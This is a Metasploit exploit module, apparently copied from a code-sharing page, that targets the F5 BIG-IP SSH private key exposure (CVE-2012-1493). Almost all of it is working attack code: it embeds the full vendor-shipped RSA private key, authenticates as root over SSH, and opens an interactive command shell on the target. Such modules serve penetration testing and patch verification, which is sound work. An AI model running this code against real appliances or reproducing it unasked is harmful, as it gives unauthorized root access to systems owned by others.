Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
require 'net/ssh'
7
require 'net/ssh/command_stream'
8
require 'rex/socket/ssh_factory'
9

10
class MetasploitModule < Msf::Exploit::Remote
11
  Rank = ExcellentRanking
12

13
  include Msf::Auxiliary::Report
14
  include Msf::Exploit::Remote::SSH
15

16
  def initialize(info = {})
17
    super(
18
      update_info(
19
        info,
20
        'Name' => 'F5 BIG-IP SSH Private Key Exposure',
21
        'Description' => %q{
22
          F5 ships a public/private key pair on BIG-IP appliances that allows
23
          passwordless authentication to any other BIG-IP box. Since the key is
24
          easily retrievable, an attacker can use it to gain unauthorized remote
25
          access as root.
26
        },
27
        'Platform' => 'unix',
28
        'Arch' => ARCH_CMD,
29
        'Privileged' => true,
30
        'Targets' => [ [ 'Universal', {} ] ],
31
        'Payload' => {
32
          'Compat' => {
33
            'PayloadType' => 'cmd_interact',
34
            'ConnectionType' => 'find'
35
          }
36
        },
37
        'Author' => ['egypt'],
38
        'License' => MSF_LICENSE,
39
        'References' => [
40
          [ 'URL', 'https://www.trustmatta.com/advisories/MATTA-2012-002.txt' ],
41
          [ 'CVE', '2012-1493' ],
42
          [ 'OSVDB', '82780' ],
43
          [ 'URL', 'https://www.rapid7.com/blog/post/2012/06/25/press-f5-for-root-shell' ]
44
        ],
45
        'DisclosureDate' => '2012-06-11',
46
        'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/interact' },
47
        'DefaultTarget' => 0,
48
        'Notes' => {
49
          'Stability' => [CRASH_SAFE],
50
          'Reliability' => [REPEATABLE_SESSION],
51
          'SideEffects' => []
52
        }
53
      )
54
    )
55

56
    register_options(
57
      [
58
        # Since we don't include Tcp, we have to register this manually
59
        Opt::RHOST(),
60
        Opt::RPORT(22)
61
      ], self.class
62
    )
63

64
    register_advanced_options(
65
      [
66
        OptBool.new('SSH_DEBUG', [ false, 'Enable SSH debugging output (Extreme verbosity!)', false]),
67
        OptInt.new('SSH_TIMEOUT', [ false, 'Specify the maximum time to negotiate a SSH session', 30])
68
      ]
69
    )
70
  end
71

72
  # helper methods that normally come from Tcp
73
  def rhost
74
    datastore['RHOST']
75
  end
76

77
  def rport
78
    datastore['RPORT']
79
  end
80

81
  def do_login(user)
82
    opt_hash = ssh_client_defaults.merge({
83
      auth_methods: ['publickey'],
84
      port: rport,
85
      key_data: [ key_data ]
86
    })
87

88
    opt_hash[:verbose] = :debug if datastore['SSH_DEBUG']
89

90
    begin
91
      ssh_socket = nil
92
      ::Timeout.timeout(datastore['SSH_TIMEOUT']) do
93
        ssh_socket = Net::SSH.start(rhost, user, opt_hash)
94
      end
95
    rescue Rex::ConnectionError
96
      return
97
    rescue Net::SSH::Disconnect, ::EOFError
98
      print_error "#{rhost}:#{rport} SSH - Disconnected during negotiation"
99
      return
100
    rescue ::Timeout::Error
101
      print_error "#{rhost}:#{rport} SSH - Timed out during negotiation"
102
      return
103
    rescue Net::SSH::AuthenticationFailed
104
      print_error "#{rhost}:#{rport} SSH - Failed authentication"
105
    rescue Net::SSH::Exception => e
106
      print_error "#{rhost}:#{rport} SSH Error: #{e.class} : #{e.message}"
107
      return
108
    end
109

110
    return false unless ssh_socket
111

112
    # Create a new session from the socket, then dump it.
113
    conn = Net::SSH::CommandStream.new(ssh_socket)
114
    ssh_socket = nil
115
    conn
116
  end
117

118
  def exploit
119
    conn = do_login('root')
120
    if conn
121
      print_good 'Successful login'
122
      handler(conn.lsock)
123
    end
124
  end
125

126
  def key_data
127
    <<~EOF
128
      -----BEGIN RSA PRIVATE KEY-----
129
      MIICWgIBAAKBgQC8iELmyRPPHIeJ//uLLfKHG4rr84HXeGM+quySiCRgWtxbw4rh
130
      UlP7n4XHvB3ixAKdWfys2pqHD/Hqx9w4wMj9e+fjIpTi3xOdh/YylRWvid3Pf0vk
131
      OzWftKLWbay5Q3FZsq/nwjz40yGW3YhOtpK5NTQ0bKZY5zz4s2L4wdd0uQIBIwKB
132
      gBWL6mOEsc6G6uszMrDSDRbBUbSQ26OYuuKXMPrNuwOynNdJjDcCGDoDmkK2adDF
133
      8auVQXLXJ5poOOeh0AZ8br2vnk3hZd9mnF+uyDB3PO/tqpXOrpzSyuITy5LJZBBv
134
      7r7kqhyBs0vuSdL/D+i1DHYf0nv2Ps4aspoBVumuQid7AkEA+tD3RDashPmoQJvM
135
      2oWS7PO6ljUVXszuhHdUOaFtx60ZOg0OVwnh+NBbbszGpsOwwEE+OqrKMTZjYg3s
136
      37+x/wJBAMBtwmoi05hBsA4Cvac66T1Vdhie8qf5dwL2PdHfu6hbOifSX/xSPnVL
137
      RTbwU9+h/t6BOYdWA0xr0cWcjy1U6UcCQQDBfKF9w8bqPO+CTE2SoY6ZiNHEVNX4
138
      rLf/ycShfIfjLcMA5YAXQiNZisow5xznC/1hHGM0kmF2a8kCf8VcJio5AkBi9p5/
139
      uiOtY5xe+hhkofRLbce05AfEGeVvPM9V/gi8+7eCMa209xjOm70yMnRHIBys8gBU
140
      Ot0f/O+KM0JR0+WvAkAskPvTXevY5wkp5mYXMBlUqEd7R3vGBV/qp4BldW5l0N4G
141
      LesWvIh6+moTbFuPRoQnGO2P6D7Q5sPPqgqyefZS
142
      -----END RSA PRIVATE KEY-----
143
    EOF
144
  end
145
end
146

147